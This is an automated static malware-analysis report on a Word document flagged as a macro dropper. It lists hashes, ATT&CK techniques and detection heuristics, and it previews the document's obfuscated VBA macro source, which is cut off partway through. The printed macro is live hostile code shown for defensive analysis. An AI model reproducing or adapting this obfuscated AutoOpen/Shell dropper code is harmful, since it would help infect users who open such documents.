Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1378a18e2ace8505…

MALICIOUS

Office (OLE)

217.5 KB Created: 2018-02-26 11:26:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 2e9d41fc03ac7a76ca69ee8b6c59b080 SHA-1: f8c7a9f0c35dbe2ede01f646576cce6de847ce2e SHA-256: 1378a18e2ace8505893b3d9387a03caa2901abb1d7a2484612722901ac72c517
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro includes a critical 'Shell()' call, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and running additional malware. The presence of the 'AutoOpen' macro further suggests immediate execution upon opening.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6457236-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6457236-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 59891 bytes
SHA-256: ce1af0cac04e04256c13fcedbeaafdc9a85303bc20d01ed016b6e91176ca3a60
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bpAzblidGvdi"
Sub iLPtKukvlk(slPvjGonACizs)
   On Error Resume Next
   Dim JTiiV()
   ReDim PdQZKwCjiFqpEK(2)
   pVmtA(0) = 1476304
   iaAMWrBaGMQma(1) = 2811424
   qklDIIuLs = Loo - 8896976
   zTwspUqZvqZ = 9762543 * 5232854
End Sub
Function rWaiOnwNz()
On Error Resume Next
kjjfH = "RVCuHXRBXDMUfvMKUKpzJJRCzzEW tPPPFAMGPP"
NauszUjcwMQ = WFTESDsCw = jXUpRlhBLnTw = (7414174 / nQmkIwihhp + 7788096 * ivNjYnrYY * (3967469 / tqGOmvAnZSoQC / 3114968 - Tan(tzGzpf / CBool(vGmni / 2758613 / FOGTWtuCksl))))
PLwQRbki = jCOEqfKQR = uSZiOsuzbwRmH = (3893082 / izjWM + 8303694 * NNJclrQ * (1352251 / OwkLvjoHBz / 551605 - Tan(tUuuuz / CBool(hiuEDh / 871395 / VlGDiUW))))
twAtlS = gjHBjhbyuf(kjjfH, 10, 2)
XWmbdtz = "wnjiwrlKjMzGYowod=%uVTtTDTKwYzBrpDqdrYiNOawhEtnMpI"
jIRAs = SwHBLTijt = wiHiFZYiEwauP = (7415848 / vsKLXvjowWjKj + 5958032 * vhaWwtDczbi * (3462259 / waYjUJPbUXWw / 3544462 - Tan(KMYOsDVCsUsow / CBool(PKksdtrVzwpXP / 1424840 / JDajzsQaMm))))
jpGpfbL = ORtiErjKX = JndTZCp = (2735186 / YUnObjQRIw + 9870748 * jXGObwmtFJMrvR * (4232454 / HGzDCwnRa / 672029 - Tan(znZYLYNa / CBool(XEzDCUWP / 1714544 / SJNqKBBwwkkonX))))
tVdJF = gjHBjhbyuf(XWmbdtz, 23, 13)
ZGawA = "pCOMptes&&YhjmkSlsSfjPDVTrTtammzChrWciwdwzSI"
pjPloKpQOnw = BApfJGiBj = jTCHm = (9606240 / HbRSlSQ + 6160848 * VJmKwXSjH * (7430552 / WwJioKPVHRf / 9265281 - Tan(XLJcjQhYz / CBool(kVPWFIBVzAOr / 1575859 / iiaCvYDq))))
GziOG = NNmkOqzrE = WKYNYoJ = (2367080 / vfwKfD + 8457967 * CpfdakuIBjVuK * (4157618 / vDUzsU / 1038348 - Tan(siSHKRDGhWvz / CBool(ZhwZi / 1040900 / EoRvaXAGL))))
FZEjJp = gjHBjhbyuf(ZGawA, 28, 12)
CEYoliQF = "dZofvIPlKtXdRXNEpiHCsijAorznAvw"
TuFlIH = MJtlLliFI = CzoWu = (7750241 / ndLwzCGTJEOdG + 8737499 * aooYSOj * (7358879 / cbfYSMnMPd / 626986 - Tan(JpMGn / CBool(CjQbCKnY / 9976749 / WViGrjTYWiA))))
aXMcGqJG = zRBOdqMRw = RfwiFLAZVl = (8817175 / FqtzwKZ + 4145497 * kFREPPNZUaHA * (1049193 / qhcmY / 3715691 - Tan(BwGkLLUdtCrdnj / CBool(iapvnzAKmL / 84473 / CRUYACojIKTE))))
APIDwDjnDIU = gjHBjhbyuf(CEYoliQF, 22, 1)
MFoAbVrnZ = "PQCitvmhVAhiOCWMMKponqPGMkZw=%cLOUirnqfwMmR"
TGoBzkvHzdn = rNTWYswrQ = ofWPnktJXtJR = (3489744 / jtqFrHNCFkUXSY + 227498 * wtLaqT * (7153247 / fUQEYkBZvXmf / 291861 - Tan(AJYlZluPSVIQu / CBool(GsEQICaW / 8165682 / iVjvbu))))
lVsWDhC = lWFGtBBFu = tPCvwHplSDSWWw = (3511802 / SPGEBzoXjl + 2123220 * WEqzVIJKTuMX * (6035212 / cYbPzGnQilwpwu / 5258644 - Tan(MKwBPNMTAN / CBool(HJYDjYEWPwUm / 832120 / FWFAj))))
oBdmkGHuMs = gjHBjhbyuf(MFoAbVrnZ, 5, 16)
tBcan = "wr3raiNahUzwMVSNSsizh"
FtstWSioW = YFhKjkjFl = APBYbSzlAwM = (3161450 / LOrrjtucQLCEcu + 2479521 * TJnzHIVTHiCXd * (1310189 / aIJWwotAMrGjEw / 3947392 - Tan(YmvjpYSoDsYjBq / CBool(wJQbvTYQC / 5025314 / bGAYRU))))
tVvkwj = mfiliaFCp = SDPJwVUH = (4909510 / WYfzVsGjwMni + 5332521 * wVMlQ * (6909888 / ZGwFNm / 3144841 - Tan(Flswdz / CBool(AiPpTZF / 5573774 / nbLNdJirpdz))))
wJoYOjAPq = gjHBjhbyuf(tBcan, 17, 3)
lvFftBWOVj = "pzQIqjjvIJPwVSzTNVYrjpaeh=%5rav%S"
UitsLodBP = jDqMUisli = rHfzWlJYNiROJN = (3248568 / iGmrjjvofo + 9488976 * kwnZdXhRo * (8530093 / wwwsWqU / 8906119 - Tan(wtwlwnPLLr / CBool(honnQvsl / 7357869 / zmprntlnZzK))))
lmpLjojV = uVZrABaqH = FwahKKKba = (9541259 / IvwHGuLudYm + 8804013 * nTNwQu * (3592372 / iKupPJcibLwAb / 7413713 - Tan(dkuHOwizT / CBool(SurwN / 2225751 / iodkCRrkiLC))))
SiMOo = gjHBjhbyuf(lvFftBWOVj, 2, 9)
ECEab = "sIwNG=%UBItzwGhVY"
jFSoizZM = oICjMlYJk = BtCHWiDdEwfAl = (9635374 / zdCziz + 2418254 * JFKNoBnCmtQU * (8749595 / EnuqSaUUn / 4448945 - Tan(ZMHWL / CBool(voGtCM / 3272889 / bRttHVd))))
cbHOAjuFV = QcZODnilS = RnIOoffamUfnd = (390935 / dbqJbajCbJ + 7066912 * IISQDnDkZIA * (7616192 / NSUAzdwXoaMn / 5536081 - Tan(OllhFDzXSUDcz / CBool(RBUaDWNILB / 5780600 / mKUiFcawozo))))
wawLnFuisRi = gjHBjhbyuf(ECEab,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.